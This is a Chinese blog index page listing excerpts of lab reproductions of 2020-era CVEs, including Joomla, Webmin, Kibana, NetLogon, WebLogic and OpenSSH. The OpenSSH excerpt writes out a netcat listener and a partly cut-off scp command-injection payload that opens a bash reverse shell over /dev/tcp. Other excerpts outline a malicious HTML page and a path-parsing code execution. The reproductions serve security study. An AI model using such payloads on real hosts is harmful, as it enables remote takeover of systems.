- 博客(17)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 Joomla SQL注入漏洞(CVE-2018-8045)复现
简介Joomla!是一套全球知名的内容管理系统。Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统影响版本joomla版本 v3.5.0 ~ v3.8.5漏洞原理可以看到对filter.category_id这个参数进行了一个强制int类型转换也就是说漏洞发生在此参数上根据notes.php,触发的代码为$categoryId这个参数没有经过任何过滤直接拼接到了sql语句中,造成sql注入环境搭建下载地址https:/...
2020-09-29 13:39:37
2089
原创 CVE-2018-3760漏洞复现
简介Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。影响版本4.0.0.beta7及更低版本3.7.1及更低版本2.12.4及更低版本。环境搭建使用docker和vulhub安装环境cd...
2020-09-29 13:32:35
732
原创 Webmin远程命令执行漏洞(CVE-2019-15107 )复现
简介Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作影响版本Webmin <= 1.920 环境搭建下载地址https://sourceforge.net/projects/webadmin/files/webmin/1.920/在这里,我们下载deb安装包,然后用dpkg -i webmin_1.920_all.deb进行安装安装前可能需要一些依赖,我们这里闲安装依赖..
2020-09-28 12:23:58
624
原创 Kibana远程代码执行漏洞(CVE-2019-7609)复现
简介攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。影响版本Kibana < 6.6.1Kibana < 5.6.15环境搭建首先去官网下载6.5.3的tar包并解压wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz...
2020-09-27 20:02:01
1124
1
原创 cve-2019-6341漏洞复现
简介Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成影响版本在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。环境搭建使用vulhub快速搭建环境cd vulhub/drupal/CVE-2019-6341/docker-compose up -d访问your-ip:8080...
2020-09-26 16:52:36
1554
原创 Linux内核本地提权漏洞(CVE-2019-13272)复现
简介kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve(可能允许攻击者控制)影响版本Linux Kernel < 5.1.17漏洞复现poc地址:https://github.com/CrisWang/Exploit-Virtual-Machine/blob/master/Linux/0...
2020-09-24 10:53:07
1099
原创 Jenkins RCE 漏洞(CVE-2019-1003000) 复现
影响版本Pipeline: Declarative Plugin up to and including 1.3.4Pipeline: Groovy Plugin up to and including 2.61Script Security Plugin up to and including 1.49环境搭建复现漏洞CVE-2019-1003000 (Script Security)测试环境需要安装dockergit clone https://github.com.
2020-09-24 10:31:02
3489
原创 CVE-2019-12922复现
简介phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具受影响的版本phpMyAdmin <= 4.9.0.1环境搭建历史版本下载下载https://www.phpmyadmin.net/files/本次测试版本4.8.1漏洞复现在登录状态下,添加一个服务器http://localhost/phpMyAdmin-4.8.1/setup/index.php...
2020-09-23 21:13:20
666
原创 CVE-2019-0541复现
简介Microsoft MSHTML引擎中存在输入验证漏洞,该漏洞源于程序没有正确地验证输入。远程攻击者可通过诱使用户编辑特制的文件利用该漏洞在当前用户的上下文中执行任意代码。影响版本Microsoft Internet Explorer 10,Internet Explorer 11,Internet Explorer 9;Excel Viewer 2007 SP3;Office 2010 SP2,Office 2013 RT SP1,Office ...
2020-09-22 21:16:43
310
原创 CVE-2019-9766漏洞复现
简介Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞。远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。环境搭建1.攻击机:kali ip:192.168.111.1292.靶机:windows10 安装Free MP3 CD Ripper 2.6版本 ip:192.168.3.20...
2020-09-21 14:36:50
444
原创 CVE-2020-13699漏洞复现
简介TeamViewer远程连接控制软件是一款随时随地连接到远程桌面电脑、移动设备及Iot,让远程连接过程更加的快速和安全,轻松实现对文件、网络及程序的实时支持或访问影响版本TeamViewer < 8.0.258861TeamViewer < 9.0.28860TeamViewer < 10.0.258873TeamViewer < 11.0.258870TeamViewer < 12.0.258869TeamViewer < 13.2.3.
2020-09-18 19:17:34
857
原创 OpenSSH命令注入漏洞(CVE-2020-15778)复现
简介OpenSSH是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效防止窃听、连接劫持以及其他攻击。影响版本<= openssh-8.3p1漏洞复现查看版本 ssh -V开启22端口服务先在本地新建好文件,用于上传本地监听nc -lvvp 4444payloadscp 1.txt root@受害机ip:'`bash -i >& /dev/tc..
2020-09-17 13:35:20
1750
原创 CVE-2020-6418复现
影响版本Chrome < 80.0.3987.122漏洞复现测试的Chrome版本为80.0.3987.87部署恶意html页面在web服务器,访问恶意html页面触发弹出Chrome内置打印机1.html<html lang="en"><head> <meta charset="UTF-8"> <title>test</title> <script typ...
2020-09-17 10:24:50
1115
原创 PhpMyadminSQL注入(CVE-2020-0554)复现
简介phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。影响版本phpMyAdmin 4 < 4.9.4phpMyAdmin 5 < 5.0.1环境搭建为了方便做事,这里我直接用把phpmyadmin文件拖入刀集成环境中下载地址https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdm...
2020-09-16 22:22:36
1941
2
原创 NetLogon特权提升漏洞(CVE-2020-1472)复现
简介CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。影响版本Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Window..
2020-09-15 23:28:45
2537
3
原创 CVE-2020-2883漏洞复现
影响版本Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0环境搭建我这里使用得是12.1.3.0.0选择第三个选项,其他默认Your-IP:7001/console打开网站即可Poc地址:https://github.com/zhzyker/exphu
2020-09-12 14:19:48
1898
1
原创 phpstudy默认配置解析漏洞复现
简介phpstudy 是一个php快速集成环境, 主要用于学习测试, 但是也有很多人为了方便行事就直接拿来部署服务器了影响版本Phpstudy<=8.1.0.7漏洞复现首先上传恶意图片文件然后访问your-IP/1.jpg/.php即可执行我们的恶意代码修复建议已经发布最新版的更新提示,直接确认更新即可临时解决方案因为cgi.fix_pathinfo这项配置用于修复路径,当发现当前路径不存在则采用上层路径因此将php.ini文件中的c..
2020-09-03 16:52:53
365
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人